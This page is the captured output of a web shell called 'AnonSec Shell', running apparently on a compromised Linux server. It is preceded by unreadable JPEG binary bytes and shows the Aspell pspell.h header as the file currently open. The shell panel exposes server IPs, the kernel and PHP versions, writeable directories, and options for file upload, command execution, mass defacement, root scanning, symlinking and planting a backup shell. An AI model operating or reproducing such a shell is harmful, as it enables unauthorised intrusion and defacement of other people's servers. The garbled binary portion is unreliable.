JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/disk_so_ralp/usr/include/pspell/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/disk_so_ralp/usr/include/pspell/pspell.h
/* This file is part of The New Aspell
 * Copyright (C) 2001 by Kevin Atkinson under the GNU LGPL
 * license version 2.0 or 2.1.  You should have received a copy of the
 * LGPL license along with this library if you did not you can find it
 * at http://www.gnu.org/.                                              */

#ifndef ASPELL_PSPELL__H
#define ASPELL_PSPELL__H

#include "../aspell.h"

#define PspellCanHaveError   AspellCanHaveError 
#define PspellErrorExtraInfo AspellErrorExtraInfo

#define pspell_error_number     aspell_error_number
#define pspell_error_message    aspell_error_message
#define delete_pspell_can_have_error delete_aspell_can_have_error

#define PspellStringEmulation AspellStringEnumeration

#define pspell_string_emulation_clone   aspell_string_enumeration_clone
#define pspell_string_emulation_assign  aspell_string_enumeration_assign
#define pspell_string_emulation_at_end  aspell_string_enumeration_at_end
#define pspell_string_emulation_next    aspell_string_enumeration_next
#define delete_pspell_string_emulation  delete_aspell_string_enumeration

#define PspellStringPair          AspellStringPair
#define PspellStringPairEmulation AspellStringPairEnumeration

#define pspell_string_pair_emulation_clone  aspell_string_pair_enumeration_clone
#define pspell_string_pair_emulation_assign aspell_string_pair_enumeration_assign
#define pspell_string_pair_emulation_at_end aspell_string_pair_enumeration_at_end
#define delete_pspell_string_pair_emulation delete_aspell_string_pair_enumeration

#define PspellKeyInfoType   AspellKeyInfoType
#define PspellKeyInfoString AspellKeyInfoString
#define PspellKeyInfoInt    AspellKeyInfoInt
#define PspellKeyInfoBool   AspellKeyInfoBool
#define PspellKeyInfoList   AspellKeyInfoList

#define PspellKeyInfo          AspellKeyInfo
#define PspellKeyInfoEmulation AspellKeyInfoEnumeration

#define PspellConfig AspellConfig

#define new_pspell_config new_aspell_config
#define delete_pspell_config delete_aspell_config
#define pspell_config_error_number aspell_config_error_number
#define pspell_config_error_message aspell_config_error_message
#define pspell_config_clone aspell_config_clone
#define pspell_config_assign aspell_config_assign
#define pspell_config_set_extra aspell_config_set_extra
#define pspell_config_keyinfo aspell_config_keyinfo
#define pspell_config_possible_elements aspell_config_possible_elements
#define pspell_config_get_default aspell_config_get_default
#define pspell_config_elements aspell_config_elements
#define pspell_config_replace aspell_config_replace
#define pspell_config_remove aspell_config_remove
#define pspell_config_have aspell_config_have
#define pspell_config_retrieve aspell_config_retrieve
#define pspell_config_retrieve_list aspell_config_retrieve_list
#define pspell_config_retrieve_bool aspell_config_retrieve_bool
#define pspell_config_retrieve_int aspell_config_retrieve_int

#define PspellStringMap AspellStringMap;

#define new_pspell_string_map new_aspell_string_map
#define delete_pspell_string_map delete_aspell_string_map
#define pspell_string_map_clone aspell_string_map_clone
#define pspell_string_map_assign aspell_string_map_assign
#define pspell_string_map_elements aspell_string_map_elements
#define pspell_string_map_insert aspell_string_map_insert
#define pspell_string_map_replace aspell_string_map_replace
#define pspell_string_map_remove aspell_string_map_remove
#define pspell_string_map_clear aspell_string_map_clear
#define pspell_string_map_lookup aspell_string_map_lookup
#define pspell_string_map_size aspell_string_map_size
#define pspell_string_map_empty aspell_string_map_empty

#define PspellWordList AspellWordList
#define pspell_word_list_encoding aspell_word_list_encoding
#define pspell_word_list_empty aspell_word_list_empty
#define pspell_word_list_size aspell_word_list_size
#define pspell_word_list_elements aspell_word_list_elements

#define PspellManager AspellSpeller
#define new_pspell_manager new_aspell_speller
#define to_pspell_manager to_aspell_speller
#define delete_pspell_manager delete_aspell_speller
#define pspell_manager_error_number aspell_speller_error_number
#define pspell_manager_error_message aspell_speller_error_message
#define pspell_manager_config aspell_speller_config
#define pspell_manager_master_word_list aspell_speller_main_word_list
#define pspell_manager_personal_word_list aspell_speller_personal_word_list
#define pspell_manager_session_word_list aspell_speller_session_word_list
#define pspell_manager_save_all_word_lists aspell_speller_save_all_word_lists
#define pspell_manager_clear_session aspell_speller_clear_session

#if defined(USE_ORIGINAL_MANAGER_FUNCS)

#  define pspell_manager_check(m,str)\
    aspell_speller_check(m,str,-1)
#  define pspell_manager_add_to_personal(m,str)\
    aspell_speller_add_to_personal(m,str,-1)
#  define pspell_manager_add_to_session(m,str)\
    aspell_speller_add_to_session(m,str,-1)
#  define pspell_manager_suggest(m,str)\
    aspell_speller_suggest(m,str,-1)
#  define pspell_manager_store_replacement(m,mis,cor)\
    aspell_speller_store_replacement(m,mis,-1,cor,-1)

#else

#  define pspell_manager_check aspell_speller_check
#  define pspell_manager_add_to_personal aspell_speller_add_to_personal
#  define pspell_manager_add_to_session aspell_speller_add_to_session
#  define pspell_manager_suggest aspell_speller_suggest
#  define pspell_manager_store_replacement aspell_speller_store_replacement

#endif

#endif /* ASPELL_PSPELL__H */

Anon7 - 2022
AnonSec Team